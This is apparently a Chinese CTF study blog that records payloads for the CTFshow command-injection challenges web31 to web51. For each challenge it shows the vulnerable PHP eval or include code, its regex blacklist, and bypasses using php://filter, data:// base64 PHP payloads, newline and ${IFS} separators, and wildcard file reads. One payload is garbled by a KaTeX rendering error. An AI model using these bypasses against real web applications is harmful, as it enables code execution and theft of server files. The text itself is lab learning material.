命令注入ctfshow

---

title: CTFshow命令注入
date: 2021-07-15
tags: [ctf]
description: 刷题记录

搜索引擎http://helosec.com/
正则解释https://regexper.com/

web31

error_reporting(0);
if(isset($_GET['c'])){
     
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
     
        eval($c);
    }
    
}else{
     
    highlight_file(__FILE__);
}

过滤
flag system php cat sort shell . 空格 ’

payload:?c=eval($_GET[1]);&1=system(“cat flag.php”);

官方wp show_source(next(array_reverse(scandir(pos(localeconv())))));
array_reverse：以相反的元素顺序返回数组
scandir： 列出指定路径中的文件和目录
pos？？？
localeconv() 函数返回一包含本地数字及货币格式信息的数组。？？？？？

web32

error_reporting(0);
if(isset($_GET['c'])){
     
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
     
        eval($c);
    }
    
}else{
     
    highlight_file(__FILE__);
}

payload: ?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
include：利用文件包含
php伪协议：php://filter/read=convert.base64-encode/resource=flag.php 用base64编码读取文件
base64在线解码：https://base64.us/

官方wp：c=$nice=include$_GET[“url”]?>&url=php://filter/read=convert.base64 encode/resource=flag.php
?>代替分号

web33

error_reporting(0);
if(isset($_GET['c'])){
     
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
     
        eval($c);
    }
    
}else{
     
    highlight_file(__FILE__);
} 

过滤 “flag” “system” “php” “cat” “sort” “shell” “.” “ ” “’” “`” “echo” “;” “(” “"”
payload: ?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
include：利用文件包含
php伪协议：php://filter/read=convert.base64-encode/resource=flag.php 用base64编码读取文件
base64在线解码：https://base64.us/

官方wp：c=?>&1=php://filter/read=convert.base64-
encode/resource=flag.php
?>

web34

error_reporting(0);
if(isset($_GET['c'])){
     
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
     
        eval($c);
    }
    
}else{
     
    highlight_file(__FILE__);
}

payload: ?c=includeKaTeX parse error: Expected 'EOF', got '&' at position 10: _GET[1]?>&̲1=php://filter/…_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

web35

。。。。。一模一样

web36

过滤数字把上面的1换成a

web 37

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
     
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
     
        include($c);
        echo $flag;
    
    }
        
}else{
     
    highlight_file(__FILE__);
}

data伪协议
payload:?c=data://text/plain,
POST A=cat flag.php
官方wp：data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

web38

过滤php
把 data伪协议
payload:?c=data://text/plain,
POST A=cat flag.php

web39

如上
hint：data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了，所以后面的.php会被当成html页面直接显示在页面上，起不到什么 作用

web40

if(isset($_GET['c'])){
     
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\（|\）|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
     
        eval($c);
    }        
}else{
     
    highlight_file(__FILE__);
}

过滤的中文括号
读取当前文件夹文件：?c=print_r(scandir(pos(localeconv())));
payload：?c=show_source(next(array_reverse(scandir(pos(localeconv())))));

localeconv()：返回一包含本地数字及货币格式信息的数组。其中数组中的第一个为点号(.)
pos()：返回数组中当前元素的值
scandir()：获取目录下的文件
array_reverse()：将数组逆序排列
next()：函数将内部指针指向下一元素，并输出

官方wp：
show_source(next(array_reverse(scandir(pos(localeconv())))));
GXYCTF的禁止套娃 通过cookie获得参数进行命令执行
c=session_start();system(session_id());
passid=ls

web41

不会来个大佬教我！！！

web42

payload：c=ls;%0a也行||也行
;执行多个命令

web43

; cat 过滤
用%0a 和 tac 等等

web44

; cat flag过滤
用%0a 和 tac fla?.php fla*.php fl\ag.php等等

web45

过滤空格
echo$IFS‘tac$IFS*`%0A
payload：/?c=tac${IFS}fla?.php%0a
system中 ${IFS}代替空格

web46 web47 web48 web 49 web50

tac|more|less|curl|nl|tail|sort|strings读取

过滤了$
%09代替
/?c=tac%09fla?.php%0a（web50过滤%09）
nl

web51

过滤$,nl用nl${IFS}fla’'g.php||